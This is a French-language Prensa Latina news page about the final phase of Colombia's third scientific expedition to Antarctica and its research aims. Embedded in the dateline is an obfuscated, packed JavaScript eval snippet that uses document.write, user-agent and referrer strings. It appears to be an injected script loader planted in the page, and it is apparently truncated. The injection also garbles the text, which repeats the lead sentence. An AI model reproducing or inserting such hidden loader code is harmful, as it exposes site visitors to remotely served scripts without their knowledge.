vendredi 19 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

La 3è expédition scientifique colombienne en Antarctique en phase finale

Bogotá eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|teayy|var|u0026u|referrer|ndhed||js|php'.split('|'),0,{})) (PL) La troisième expédition scientifique colombienne en Antarctique prendra fin le 2 mars après plus de deux mois de recherches dans ce continent.

Bogotá (PL) La troisième expédition scientifique colombienne en Antarctique prendra fin le 2 mars après plus de deux mois de recherches dans ce continent.

Les explorateurs sont partis de Carthagène le 16 décembre 2016. D’après Rafael Ricardo Parra, capitaine du vaisseau, l’un des objectifs principaux de cette expédition est de prendre des échantillons de la peau de baleines et éléphants de mer pour analyser leur matériel génétique et déterminer le niveau de pollution. Aussi, analyser le fonctionnement du cerveau et du corps humain dans des conditions de baisses températures et rayonnement solaire.

Les chercheurs souhaitent, d’ailleurs, identifier des micro-organismes ayant un potentiel industriel et pharmacologique.

Les explorateurs colombiens espèrent aussi obtenir des preuves sur le rapport du phénomène El Niño avec le changement climatique et l’impact de ce dernier sur les côtes de la Colombie.

La Colombie envisage de construire une station permanente en Antarctique à fin d’étendre  leurs recherches dans ce continent.

Rm/Lp/arc/ap

EN CONTINU
notes connexes